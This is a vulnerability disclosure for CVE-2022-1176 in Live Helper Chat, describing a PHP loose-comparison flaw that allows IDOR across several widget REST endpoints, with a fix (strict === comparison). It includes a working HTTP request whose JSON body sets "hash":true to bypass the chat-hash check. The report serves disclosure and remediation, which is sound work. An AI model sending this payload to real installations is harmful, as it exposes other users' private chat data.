Headline
CVE-2022-1176: Loose comparison causes IDOR on multiple endpoints in livehelperchat
Loose comparison causes IDOR on multiple endpoints in GitHub repository livehelperchat/livehelperchat prior to 3.96.
Description
Live Helper Chat is vulnerable to Type Juggling on the requestPayload['hash']
. The application uses a Loose Comparison to check if the user-controlled parameter is equal to an hash, this check is vulnerable because it’s possible to pass other Data Types via JSON that causes the if
condition to be True
. This occurs on multiple endpoints.
Proof of Concept
For the PoC, the vulnerability resides on https://github.com/LiveHelperChat/livehelperchat/blob/master/lhc_web/modules/lhwidgetrestapi/fetchmessage.php#L19
if ($chat instanceof erLhcoreClassModelChat && $chat->hash == $requestPayload['hash'])
Request
POST /eng/widgetrestapi/fetchmessages HTTP/1.1 Host: demo.livehelperchat.com Cookie: lhc_vid=eb9bc0c044919538c5b1 Content-Length: 62 Sec-Ch-Ua: "(Not(A:Brand";v="8", “Chromium";v="99” Accept: application/json, text/plain, / Content-Type: application/x-www-form-urlencoded Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Sec-Ch-Ua-Platform: “macOS” Origin: https://demo.livehelperchat.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.livehelperchat.com/ Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close
{"chat_id":2,"hash":true,"lmgsid":1,"theme":1,"new_chat":true}
Note the "hash":true
, this will make the if
always return True
.
The loose comparison can be solved by using a type safe check ===
or updating PHP to 8 <=
.
I’ve attached more occurrences of the same vulnerability: modules/lhwidgetrestapi/fetchmessage.php modules/lhwidgetrestapi/fetchmessages.php modules/lhwidgetrestapi/getmessagesnippet.php modules/lhwidgetrestapi/initchat.php modules/lhwidgetrestapi/uisettings.php
Impact
It’s possible to bypass multiple checks. An attacker could access private information of other users.
Occurrences